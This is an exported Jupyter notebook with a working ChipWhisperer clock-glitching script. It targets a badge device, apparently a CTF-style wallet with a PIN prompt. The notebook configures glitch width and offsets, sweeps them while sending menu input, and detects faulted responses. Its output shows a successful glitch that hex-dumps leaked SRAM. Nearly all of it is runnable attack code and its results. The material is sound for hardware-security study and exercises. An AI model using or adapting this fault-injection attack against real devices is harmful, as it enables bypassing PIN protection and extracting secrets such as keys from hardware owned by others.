<p><strong style="font-size:24px;">The Badge Fault Injection Script</strong></p>

In [142]:
import chipwhisperer

%matplotlib notebook
import matplotlib.pylab as plt

SCOPETYPE = 'OPENADC'
PLATFORM = 'BADGE'
CRYPTO_TARGET = 'NONE'

import chipwhisperer as cw
scope = cw.scope()
target = cw.target(scope)

%run ../Setup_Scripts/Setup_Generic.ipynb

scope.default_setup()
scope.clock.clkgen_freq = 24E6 #Tune to optimze glitch size
target.baud = 115200 #match to target UART


INFO: Found ChipWhisperer😍


In [174]:
# Test writing to the target
target.flush()
target.write("3\n")
time.sleep(0.3)  #wait for response
# Reading from the target
response = target.read()
print(f"Response length: {len(response)}")
print(response)


Response length: 15
IR: Enter PIN: 


In [146]:
# Reading from the target
response = target.read()
print(f"Response length: {len(response)}")
print(response)

Response length: 133
IR: Invalid PIN!


Invalid selection, please try again.

No Wallet Loaded
1 - Create Login
2 - Load Account
3 - Load Saved Account
> 


In [147]:
import chipwhisperer.common.results.glitch as glitch
gc = glitch.GlitchController(groups=["glitch", "reset", "locked", "normal"], parameters=["width", "offset", "ext_offset"])
#gc.display_stats()

scope.glitch.clk_src = "clkgen" # set glitch input clock

scope.glitch.output = "glitch_only" # glitch_out = clk ^ glitch

scope.glitch.trigger_src = "ext_single" # glitch only after scope.arm() called
scope.glitch.arm_timing = 'before_scope'

scope.adc.basic_mode = 'falling_edge'

scope.io.tio4 = 'high_z'

scope.io.glitch_lp = True
scope.io.glitch_hp = True

In [185]:
import chipwhisperer.common.results.glitch as glitch
from tqdm.notebook import trange
import struct
import re
import time

# Define ANSI color codes
RED = '\033[91m'
GREEN = '\033[92m'
RESET = '\033[0m'

TIO4 = 3 # 0-3

def read_response(max_bytes=4096, timeout_ms=400):
    """Read response with optimized timeout and larger buffer for >1k bytes."""
    response = ''
    start_time = time.time()
    # Read until no more data or timeout
    while time.time() - start_time < (timeout_ms / 1000.0):
        chunk = target.read(max_bytes, timeout=timeout_ms / 1000.0)
        if not chunk:
            break
        response += chunk
    return response

def reboot_flush():
    """Minimize reset delays by reducing sleep times and polling readiness."""
    global rebootFlag
    scope.io.nrst = False  # Reset board
    time.sleep(0.01)  # Reduced from 0.02
    scope.io.nrst = "high_z"  # Release reset
    time.sleep(1)  # Reduced from 0.02
    rebootFlag = True
    # Poll for target readiness instead of fixed 1s sleep
    start_time = time.time()
    while time.time() - start_time < 0.5:  # Max 500ms
        if scope.io.tio_states[TIO4] == 1:  # Check menu ready signal
            break
    else:
        time.sleep(0.1)  # Fallback if not ready

def hex_dump(buffer):
    """Dump buffer as hex and ASCII."""
    if isinstance(buffer, str):
        buffer = buffer.encode()
    hex_chars_per_line = 16
    for i in range(0, len(buffer), hex_chars_per_line):
        chunk = buffer[i:i + hex_chars_per_line]
        hex_values = ' '.join(f'{byte:02x}' for byte in chunk)
        printable_chars = ''.join((chr(byte) if 32 <= byte <= 126 else '.') for byte in chunk)
        address = f'{i:08x}'
        print(f'{address}: {hex_values:<39}  {printable_chars}')

def reset_scope():
    """Reset glitch scope settings."""
    scope.io.glitch_hp = False
    scope.io.glitch_lp = False
    scope.io.glitch_hp = True
    scope.io.glitch_lp = True
    scope.io.nrst = "high_z"

print("Working...")
scope.glitch.ext_offset = 1

# Glitch parameter ranges
gc.set_range("width", -45, -45)  # Fixed width as in original
gc.set_range("offset", 1, 45)
#gc.set_range("ext_offset", 20481, 20486)  # Tight range for -520ns timing ~685us
gc.set_range("ext_offset", 26912, 26912)  # target 953us
gc.set_global_step(0.5)
scope.glitch.repeat = 5
scope.adc.timeout = 0.3

global rebootFlag
reboot_flush()

gcnt = 0
rebootFlag = False

# Expected response lengths
expected_normal_response_length = 16
expected_double_response_length = 77
expected_success_response_length = 150

# Cache glitch values once
glitch_values = list(gc.glitch_values())
print("Number of elements to loop through:", len(glitch_values))

send_newline = False

# Main glitch loop
for glitch_setting in glitch_values:
    scope.glitch.width = glitch_setting[0]
    scope.glitch.offset = glitch_setting[1]
    scope.glitch.ext_offset = glitch_setting[2]

    parameters = {
        'width': scope.glitch.width,
        'offset': scope.glitch.offset,
        'ext_offset': scope.glitch.ext_offset
    }

    # Wait for menu ready signal
    while scope.io.tio_states[TIO4] == 0: # signals 0 - 4
        pass

    # Minimize I/O overhead
    target.flush()

    #print("Send Trigger")
    if send_newline:
        target.write(b'1\n')
    else:
        target.write(b'3')
    send_newline = not send_newline

    # Re-enable hardware triggering
    scope.arm()
    if scope.capture():  # Check for timeout
        print("Capture timeout...")
        reset_scope()
        reboot_flush()
        continue
    
    # Read response with optimized timeout
    #response = read_response(max_bytes=1000, timeout_ms=400)
    response = read_response(max_bytes=4096, timeout_ms=500)
    #print(f"Response length: {len(response)}")
    
    time.sleep(0.20)

    # Handle response
    if 'seed' in response:
        #print("Reset Detected!")
        #print("\t", parameters)
        #print("\t", f"Response len: {RED}{len(response)}{RESET}")
        reset_scope()
        reboot_flush()

    elif len(response) < expected_normal_response_length:
        #print("Lockup")
        #print("\t", parameters)
        #print("\t", f"Response len: {RED}{len(response)}{RESET}")
        #hex_dump(response)
        reset_scope()
        reboot_flush()
        
    elif len(response) > expected_double_response_length:
        print(f"Glitch Detected! Response length {len(response)}")
        print("\t", gcnt + 1, scope.glitch.ext_offset)
        gcnt += 1
        
        # Read serial port again to capture additional bytes
        #additional_response = read_response(max_bytes=4096, timeout_ms=2000)
        #response += additional_response
        #print(f"Additional response length: {len(additional_response)}, Total length: {len(response)}")
        #reset_scope()  # Commented out as in user-provided snippet
        
        if len(response) > expected_success_response_length:
            print("\tSuccess! SRAM Dump!")
            print("\t🐙\r\n", end="")
            hex_dump(response)  # Dump the combined response
            print("Exiting...")
            raise SystemExit

print("Exit")

Working...
Number of elements to loop through: 89


(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:642) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0f
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:642) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0e


Capture timeout...


(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:642) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0f
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:642) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0e


Capture timeout...
Glitch Detected! Response length 5931
	 1 26912
	Success! SRAM Dump!
	🐙
00000000: 49 52 3a 20 45 6e 74 65 72 20 50 49 4e 3a 20 00  IR: Enter PIN: .
00000010: c3 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ..............

SystemExit: 